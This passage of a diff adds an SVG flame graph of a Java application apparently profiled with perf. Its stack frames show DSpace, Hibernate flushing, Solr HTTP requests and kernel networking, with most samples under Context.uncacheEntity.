+<text  x="113.21" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="797.6" y="37" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="800.60" y="47.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (17 samples, 1.35%)</title><rect x="94.3" y="501" width="15.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="97.29" y="511.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item_$$_jvst437_4:::getCollections (2 samples, 0.16%)</title><rect x="777.0" y="501" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="511.5" ></text>
+</g>
+<g >
+<title>clock_gettime@GLIBC_2.2.5 (2 samples, 0.16%)</title><rect x="116.8" y="869" width="1.8" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="119.76" y="879.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (1 samples, 0.08%)</title><rect x="784.5" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="787.49" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (2 samples, 0.16%)</title><rect x="1159.1" y="405" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1162.10" y="415.5" ></text>
+</g>
+<g >
+<title>__local_bh_enable_ip (17 samples, 1.35%)</title><rect x="94.3" y="549" width="15.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="97.29" y="559.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.08%)</title><rect x="1138.5" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1141.49" y="463.5" ></text>
+</g>
+<g >
+<title>acpi_os_read_port (1 samples, 0.08%)</title><rect x="1124.4" y="213" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/http/pool/AbstractConnPool:::getPoolEntryBlocking (1 samples, 0.08%)</title><rect x="1151.6" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.60" y="447.5" ></text>
+</g>
+<g >
+<title>perf_swevent_add (1 samples, 0.08%)</title><rect x="64.3" y="549" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="67.32" y="559.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/WrapVisitor:::processValue (1 samples, 0.08%)</title><rect x="543.8" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="546.81" y="447.5" ></text>
+</g>
+<g >
+<title>sk_stream_alloc_skb (2 samples, 0.16%)</title><rect x="86.8" y="725" width="1.9" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="89.79" y="735.5" ></text>
+</g>
+<g >
+<title>find_busiest_group (1 samples, 0.08%)</title><rect x="81.2" y="613" width="0.9" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="84.17" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (1 samples, 0.08%)</title><rect x="1140.4" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.37" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::resolve (1 samples, 0.08%)</title><rect x="781.7" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="784.68" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::isEntityType (1 samples, 0.08%)</title><rect x="517.6" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="520.59" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::listeners (3 samples, 0.24%)</title><rect x="297.5" y="405" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="300.51" y="415.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.08%)</title><rect x="384.6" y="357" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="387.60" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::serialize (1 samples, 0.08%)</title><rect x="1159.1" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1162.10" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isEntityType (1 samples, 0.08%)</title><rect x="1080.4" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1083.43" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="181" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="191.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%)</title><rect x="957.7" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="960.75" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (24 samples, 1.90%)</title><rect x="705.8" y="437" width="22.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="708.83" y="447.5" >o..</text>
+</g>
+<g >
+<title>ip_protocol_deliver_rcu (1 samples, 0.08%)</title><rect x="99.9" y="373" width="0.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="102.90" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::hasHolder (1 samples, 0.08%)</title><rect x="239.4" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="242.44" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/HttpStrictMultipart:::formatMultipartHeader (5 samples, 0.40%)</title><rect x="792.9" y="309" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::uncacheEntity (682 samples, 54.13%)</title><rect x="118.6" y="549" width="638.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="121.63" y="559.5" >org/dspace/core/Context:::uncacheEntity</text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (1 samples, 0.08%)</title><rect x="761.1" y="501" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="764.08" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/RequestTargetHost:::process (1 samples, 0.08%)</title><rect x="1154.4" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1157.41" y="415.5" ></text>
+</g>
+<g >
+<title>schedule (20 samples, 1.59%)</title><rect x="63.4" y="693" width="18.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="66.38" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (5 samples, 0.40%)</title><rect x="836.9" y="469" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="839.94" y="479.5" ></text>
+</g>
+<g >
+<title>rcu_segcblist_ready_cbs (1 samples, 0.08%)</title><rect x="158.0" y="293" width="0.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="160.97" y="303.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (4 samples, 0.32%)</title><rect x="10.0" y="725" width="3.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="13.00" y="735.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_one_core (15 samples, 1.19%)</title><rect x="96.2" y="437" width="14.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="99.16" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (9 samples, 0.71%)</title><rect x="810.7" y="437" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="813.71" y="447.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.08%)</title><rect x="777.9" y="341" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.94" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::isEntityType (1 samples, 0.08%)</title><rect x="241.3" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="244.32" y="415.5" ></text>
+</g>
+<g >
+<title>nf_ct_get_tuple (1 samples, 0.08%)</title><rect x="91.5" y="549" width="0.9" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="94.48" y="559.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="357" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="367.5" ></text>
+</g>
+<g >
+<title>do_futex (4 samples, 0.32%)</title><rect x="10.0" y="789" width="3.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="13.00" y="799.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/collection/AbstractCollectionPersister:::getElementType (1 samples, 0.08%)</title><rect x="300.3" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="303.32" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (7 samples, 0.56%)</title><rect x="804.2" y="469" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="807.16" y="479.5" ></text>
+</g>
+<g >
+<title>acpi_ev_detect_gpe (1 samples, 0.08%)</title><rect x="1124.4" y="261" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="271.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (1 samples, 0.08%)</title><rect x="518.5" y="341" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="521.52" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (26 samples, 2.06%)</title><rect x="973.7" y="405" width="24.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="976.67" y="415.5" >o..</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setCurrentSession (1 samples, 0.08%)</title><rect x="912.8" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="915.79" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultHttpResponseParser:::parseHead (1 samples, 0.08%)</title><rect x="1158.2" y="309" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/DefaultThrowableRenderer:::render (1 samples, 0.08%)</title><rect x="792.0" y="293" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.98" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="761.1" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="778.9" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/IdentityHashMap:::nextKeyIndex (1 samples, 0.08%)</title><rect x="745.2" y="453" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="748.16" y="463.5" ></text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="817.3" y="245" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="820.27" y="255.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/StatementPreparerImpl$StatementPreparationTemplate:::prepareStatement (1 samples, 0.08%)</title><rect x="759.2" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="762.21" y="351.5" ></text>
+</g>
+<g >
+<title>java/io/SequenceInputStream:::nextStream (1 samples, 0.08%)</title><rect x="797.6" y="261" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="800.60" y="271.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::toArray (2 samples, 0.16%)</title><rect x="780.7" y="469" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="783.75" y="479.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.08%)</title><rect x="1144.1" y="405" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1147.11" y="415.5" ></text>
+</g>
+<g >
+<title>perf_event_sched_in (1 samples, 0.08%)</title><rect x="64.3" y="629" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="67.32" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration$1:::entrySet (1 samples, 0.08%)</title><rect x="1138.5" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1141.49" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/TimSort:::sort (1 samples, 0.08%)</title><rect x="777.0" y="437" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="780.00" y="447.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.08%)</title><rect x="749.8" y="405" width="1.0" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="752.84" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (6 samples, 0.48%)</title><rect x="985.8" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="988.84" y="383.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="797.6" y="181" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="800.60" y="191.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/JoinWalker:::mergeOuterJoins (1 samples, 0.08%)</title><rect x="1010.2" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1013.19" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.08%)</title><rect x="732.0" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="735.05" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CollectionEntry:::getOrphans (8 samples, 0.63%)</title><rect x="288.1" y="405" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="291.14" y="415.5" ></text>
+</g>
+<g >
+<title>perf_event_sched_in (1 samples, 0.08%)</title><rect x="13.7" y="677" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="16.75" y="687.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (35 samples, 2.78%)</title><rect x="84.0" y="853" width="32.8" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="86.98" y="863.5" >en..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (207 samples, 16.43%)</title><rect x="118.6" y="453" width="193.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="121.63" y="463.5" >org/hibernate/event/inter..</text>
+</g>
+<g >
+<title>tcp_recvmsg (23 samples, 1.83%)</title><rect x="60.6" y="757" width="21.5" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="63.57" y="767.5" >t..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="531.6" y="389" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="534.63" y="399.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.08%)</title><rect x="868.8" y="469" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="871.78" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%)</title><rect x="943.7" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="946.70" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration$1:::entrySet (2 samples, 0.16%)</title><rect x="1143.2" y="437" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1146.17" y="447.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg (32 samples, 2.54%)</title><rect x="84.0" y="757" width="30.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="86.98" y="767.5" >tc..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (8 samples, 0.63%)</title><rect x="1155.3" y="517" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1158.35" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.08%)</title><rect x="240.4" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="243.38" y="415.5" ></text>
+</g>
+<g >
+<title>deactivate_task (1 samples, 0.08%)</title><rect x="63.4" y="661" width="0.9" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="66.38" y="671.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (23 samples, 1.83%)</title><rect x="820.1" y="485" width="21.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.08" y="495.5" >o..</text>
+</g>
+<g >
+<title>org/hibernate/loader/DefaultEntityAliases:::getSuffixedPropertyAliases (2 samples, 0.16%)</title><rect x="1005.5" y="421" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1008.51" y="431.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor18:::invoke (1 samples, 0.08%)</title><rect x="761.1" y="485" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="764.08" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::propertySelectFragmentFragment (1 samples, 0.08%)</title><rect x="1011.1" y="373" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1014.13" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/DSpaceServiceManager:::getServicesByType (4 samples, 0.32%)</title><rect x="1134.7" y="517" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1137.75" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CollectionEntry:::getOrphans (3 samples, 0.24%)</title><rect x="748.0" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="750.97" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="341" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="351.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="793.9" y="293" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="796.86" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (7 samples, 0.56%)</title><rect x="786.4" y="501" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="789.37" y="511.5" ></text>
+</g>
+<g >
+<title>wait_woken (20 samples, 1.59%)</title><rect x="63.4" y="725" width="18.7" height="15.0" fill="rgb(219,79,79)" rx="2" ry="2" />
+<text  x="66.38" y="735.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (18 samples, 1.43%)</title><rect x="849.1" y="453" width="16.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="852.11" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (233 samples, 18.49%)</title><rect x="335.9" y="453" width="218.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="338.90" y="463.5" >org/hibernate/event/internal..</text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::resolve (1 samples, 0.08%)</title><rect x="777.0" y="229" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="239.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CollectionEntry:::getOrphans (17 samples, 1.35%)</title><rect x="621.5" y="421" width="16.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="624.54" y="431.5" ></text>
+</g>
+<g >
+<title>Interpreter (1,118 samples, 88.73%)</title><rect x="118.6" y="757" width="1047.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="121.63" y="767.5" >Interpreter</text>
+</g>
+<g >
+<title>tcp_write_xmit (26 samples, 2.06%)</title><rect x="88.7" y="693" width="24.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="91.67" y="703.5" >t..</text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.08%)</title><rect x="1150.7" y="405" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1153.67" y="415.5" ></text>
+</g>
+<g >
+<title>tcp_write_xmit (1 samples, 0.08%)</title><rect x="113.0" y="709" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="116.02" y="719.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (12 samples, 0.95%)</title><rect x="1178.8" y="677" width="11.2" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="1181.76" y="687.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.16%)</title><rect x="830.4" y="357" width="1.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="833.38" y="367.5" ></text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="1161.9" y="261" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1164.90" y="271.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getBitstreams (3 samples, 0.24%)</title><rect x="779.8" y="485" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="495.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (2 samples, 0.16%)</title><rect x="739.5" y="453" width="1.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="742.54" y="463.5" ></text>
+</g>
+<g >
+<title>__update_load_avg_cfs_rq (1 samples, 0.08%)</title><rect x="1118.8" y="277" width="1.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1121.83" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (2 samples, 0.16%)</title><rect x="1138.5" y="485" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1141.49" y="495.5" ></text>
+</g>
+<g >
+<title>bbr_cwnd_event (1 samples, 0.08%)</title><rect x="111.1" y="677" width="1.0" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="114.14" y="687.5" ></text>
+</g>
+<g >
+<title>__sys_sendto (33 samples, 2.62%)</title><rect x="84.0" y="805" width="30.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="86.98" y="815.5" >__..</text>
+</g>
+<g >
+<title>java/lang/reflect/Method:::invoke (1,118 samples, 88.73%)</title><rect x="118.6" y="741" width="1047.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="121.63" y="751.5" >java/lang/reflect/Method:::invoke</text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.08%)</title><rect x="1136.6" y="373" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1139.62" y="383.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read_port (1 samples, 0.08%)</title><rect x="1124.4" y="229" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="239.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="782.6" y="357" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="785.62" y="367.5" ></text>
+</g>
+<g >
+<title>schedule_timeout (20 samples, 1.59%)</title><rect x="63.4" y="709" width="18.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="66.38" y="719.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (6 samples, 0.48%)</title><rect x="290.0" y="389" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="293.02" y="399.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (1 samples, 0.08%)</title><rect x="1140.4" y="405" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1143.37" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%)</title><rect x="704.9" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.89" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/MultipartEntity:::isChunked (1 samples, 0.08%)</title><rect x="802.3" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="805.29" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (4 samples, 0.32%)</title><rect x="524.1" y="421" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="527.14" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="779.8" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="447.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read (1 samples, 0.08%)</title><rect x="1124.4" y="245" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="255.5" ></text>
+</g>
+<g >
+<title>ipt_do_table (1 samples, 0.08%)</title><rect x="90.5" y="565" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="93.54" y="575.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="782.6" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="447.5" ></text>
+</g>
+<g >
+<title>[[vdso]] (2 samples, 0.16%)</title><rect x="116.8" y="853" width="1.8" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="119.76" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (368 samples, 29.21%)</title><rect x="319.0" y="469" width="344.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="322.05" y="479.5" >org/hibernate/event/internal/AbstractFlushingE..</text>
+</g>
+<g >
+<title>prepare_exit_to_usermode (12 samples, 0.95%)</title><rect x="1178.8" y="773" width="11.2" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1181.76" y="783.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="779.8" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="431.5" ></text>
+</g>
+<g >
